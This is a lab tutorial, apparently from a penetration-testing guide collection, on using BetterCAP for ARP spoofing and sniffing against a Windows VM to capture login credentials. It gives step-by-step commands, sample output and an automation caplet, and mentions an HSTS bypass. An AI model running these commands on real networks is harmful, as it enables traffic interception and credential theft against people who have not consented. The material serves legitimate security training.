Network-Servers-Penetration-Guides-and-Tools

MITM attack using BetterCAP

BetterCAP is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.

Bettercap Official Documentation: https://www.bettercap.org/intro/

Official Repo: https://github.com/bettercap/bettercap

MITM Attack (Man-in-the-Middle Attack)

An MITM is aform of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

MITM attacks come in many variations.

Objectives

Sniff network traffic and perform ARP poisoning.
Launch Man-in-the-Middle attack.
Sniff network traffic for passwords.

Requisites

Kali Linux virtual machine.
Any Windows virtual machine (7, 8, 10 or Server).

Install BetterCAP

Launch your Kali Linux, open a new Terminal window and type the following commands:

apt-get update
apt-get install bettercap

BetterCAP modules

To launch the program, type bettercap and specify your current network interface:

bettercap -iface eth0

Type help to list all modules available:

help

modules

The module events.stream is running by default, this module is enabled by default and is responsible for reporting events (logs, new hosts being found, etc) generated by other modules during the interactive session. Moreover, it can be used to programmatically execute commands when specific events occur.

To perform a MITM attack we will use these modules below:

module	about
`net.probe`	When activated, this module will send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. [+]
`net.recon`	This module is responsible for periodically reading the system ARP table in order to detect new hosts on the network. [+]
`arp.spoof`	This module keeps spoofing selected hosts on the network using crafted ARP packets in order to perform a MITM attack. [+]
`net.sniff`	This module is a network packet sniffer and fuzzer supporting both BPF syntax and regular expressions for filtering. It is also able to dissect several major protocols in order to harvest credentials. [+]

You can type help following with the module name to grab some details about:

Setting up the Modules to perform an ARP spoofing

Start the prober module to send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. (Note: the prober module may start automatically the net.recon module).

net.probe on

0.2.0/24 > 10.0.2.42  » net.probe on
0.2.0/24 > 10.0.2.42  » [11:43:32] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
0.2.0/24 > 10.0.2.42  » [11:43:32] [endpoint.new] endpoint 10.0.2.3 detected as 07:00:27:11:6c:7d .
0.2.0/24 > 10.0.2.42  » [11:43:33] [endpoint.new] endpoint 10.0.2.43 detected as 07:00:27:81:d6:f2 .

In my lab, the 10.0.2.43 is my Windows virtual machine, this may differ from your virtual environment.

Start network hosts discovery:

net.recon on

Note: you can type net.show to view all the connected clients viewing the IP addresses and MAC addresses.

Set the arp.spoof module option fullduplex to true. When you set to true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail).

set arp.spoof.fullduplex true
Specify the target to spoof. (A comma separated list of MAC addresses, IP addresses, IP ranges or aliases to spoof).

set arp.spoof.targets 10.0.2.43
Start ARP spoofer:

arp.spoof on

0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof enabling forwarding
0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.

Start the packet sniffer:

net.sniff on
Type help to list the modules running:

The ARP spoofing

Bettercap is fooling the router and the target machine(Windows), putting the attacker machine(Kali) on the middle of the connection.

arp

On my Windows machine, I will use the arp table command to see what is going on:

arp5

As you can see, the Windows machine ‘thinks’ the router MAC address is the same as the Kali since the ARP table is spoofed.

Generate some generic traffic on the Target machine.

Log into your Windows virtual machine.
Launch the browser and type the URL: http://testhtml5.vulnweb.com
Login into this vulnerable-testing-website with sample credentials: **user: admin password: password**.

Grabbing and analyzing every request

Back to your Bettercap on Kali machine and analyze all the requests sent from the Windows.

As you can see, we captured the credentials sent to the website. Anything that the target machine sent and received will be captured by Kali Linux machine.

Note: this technique works on HTTP websites not HTTPS. To perform such action you need to bypass the HSTS (HTTP Strict Transport Security). You can perform this technique using Bettercap and hstshijack caplet.

Automate BetterCAP using Caplets

To be more efficient on your work, you can automate the modules setup part by creating a simple Caplet file(file.cap) and adding the commands per line.

Create the caplet:

touch spoof.cap
Add the commands and save it :

nano spoof.cap

net.probe on
set arp.spoof.fullduplex true 
set arp.spoof.targets 10.0.2.5
arp.spoof on
set net.sniff.local true
net.sniff on

As you can see is the same commands in order that you used previously.

Start the Bettercap using the spoof Caplet that you created:

bettercap -iface eth0 -caplet spoof.cap